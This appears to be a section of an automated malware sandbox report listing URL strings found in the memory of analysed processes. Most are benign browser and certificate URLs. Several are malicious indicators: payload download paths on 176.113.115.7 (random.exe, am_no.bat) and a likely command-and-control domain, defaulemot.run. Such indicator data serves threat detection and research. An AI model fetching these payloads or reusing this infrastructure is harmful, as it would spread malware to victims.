                      Source: 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe4
                      Source: 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exenPack
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/off/random.exe
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/steam/random.exe
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/test/am_no.bat
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/test/exe/random.exe
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/well/random.exe
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/well/random.exe08TU
                      Source: 19be97887a.exe, 0000001E.00000003.2000452284.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7:80/mine/random.exe
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.yahoo.co.jp/compose/?To=%s
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
                      Source: powershell.exe, 0000000C.00000002.940983859.000002563FE64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: svchost.exe, 00000015.00000002.2129097512.000002CF0FA8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/common
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/dates-and-times
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/math
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/regular-expressions
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/sets
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/strings
                      Source: svchost.exe, 00000015.00000003.1203494684.000002CF0F8C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: firefox.exe, 00000034.00000002.2034146199.000001F922A3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1988159515.000001F91E5B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E49E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2034146199.000001F922A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2034146199.000001F922A06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922777000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1991428513.000001F91ED89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                      Source: powershell.exe, 0000000C.00000002.970405411.0000025651CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.970405411.0000025651B6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.941241266.00000256434CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1045529664.0000024D901AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1045529664.0000024D9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: powershell.exe, 0000000F.00000002.956232423.0000024D8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sCan
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
                      Source: powershell.exe, 0000000C.00000002.941241266.0000025641B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.956232423.0000024D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/URIFixup.sys.mjs
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
                      Source: powershell.exe, 0000000F.00000002.956232423.0000024D8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttps://mail.inbox.lv/compose?to=%s
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
                      Source: powershell.exe, 0000000C.00000002.940983859.000002563FE64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                      Source: 2qv26zF.exe, 2qv26zF.exe, 0000001D.00000002.2112781508.00000176360A4000.00000004.00000020.00020000.00000000.sdmp, 2qv26zF.exe, 0000001D.00000002.2116999751.0000017637AB0000.00000040.00001000.00020000.00000000.sdmp, 2qv26zF.exe, 0000001D.00000003.1855748033.0000017637E2E000.00000004.00000020.00020000.00000000.sdmp, 2qv26zF.exe, 0000001D.00000003.1855748033.0000017637DB5000.00000004.00000020.00020000.00000000.sdmp, 2qv26zF.exe, 0000001D.00000003.1855748033.0000017637E28000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, spoolsv.exe, 0000001F.00000003.1855042345.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1842727698.0000000002071000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1994559542.00000000022E9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2088858561.0000000001653000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2005686989.0000000002276000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1848199291.0000000001A18000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2028479893.0000000001A1F000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2086449801.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1845357722.00000000019AC000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1992491073.00000000019AA000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1847223350.00000000019AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1841984407.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.1843105811.0000000001A1B000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2088858561.00000000016C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: 19be97887a.exe, 0000001E.00000003.1786349371.00000000058AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
                      Source: firefox.exe, 00000034.00000003.1956668985.000001F922A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1957376931.000001F922A3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958286370.000001F922A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1956268965.000001F922800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/https://www.google.com/searchWikipedia
                      Source: 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/settings/clients
                      Source: firefox.exe, 00000034.00000002.1983640551.000001F91497A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.co
                      Source: firefox.exe, 00000034.00000002.1983640551.000001F914970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
                      Source: firefox.exe, 00000034.00000002.1983640551.000001F914A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-brow
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                      Source: powershell.exe, 0000000C.00000002.941241266.0000025641B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.956232423.0000024D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.accounts.firefox.com/v1
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://blocked.cdn.mozilla.net/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1378427
                      Source: 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 19be97887a.exe, 0000001E.00000003.1726455907.00000000058C9000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: 19be97887a.exe, 0000001E.00000003.1726455907.00000000058C9000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://content.cdn.mozilla.net
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
                      Source: powershell.exe, 0000000F.00000002.1045529664.0000024D9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000F.00000002.1045529664.0000024D9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000F.00000002.1045529664.0000024D9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://coverage.mozilla.org
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://crash-stats.mozilla.org/report/index/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://dap-02.api.divviup.org
                      Source: 19be97887a.exe, 0000001E.00000003.1867210058.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/
                      Source: 19be97887a.exe, 00000023.00000003.1868838432.0000000000D73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/0g
                      Source: 19be97887a.exe, 0000001E.00000003.2006194784.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1826169771.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1753945478.00000000058B1000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1785686252.0000000005891000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1861995651.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1822807312.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1827281753.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1816412017.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1831756207.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1829292080.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1818941656.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1869981140.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1831672811.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1753599046.00000000058B1000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1815975585.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1999887350.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1868750086.0000000000D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/jUSiaz
                      Source: 19be97887a.exe, 0000001E.00000003.2000452284.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1833397027.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1832789599.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1861451133.0000000000CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/jUSiaz$I
                      Source: 19be97887a.exe, 0000001E.00000003.1888188996.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/jUSiaz-I
                      Source: 19be97887a.exe, 0000001E.00000003.1785686252.0000000005891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/jUSiazAa
                      Source: 19be97887a.exe, 0000001E.00000003.1861814703.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/jUSiazX
                      Source: 19be97887a.exe, 0000001E.00000003.1753945478.00000000058B1000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1753599046.00000000058B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/jUSiazd
                      Source: 19be97887a.exe, 0000001E.00000003.2000452284.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1868838432.0000000000D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run:443/jUSiaz
                      Source: 19be97887a.exe, 0000001E.00000003.2000452284.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1861451133.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run:443/jUSiaz?
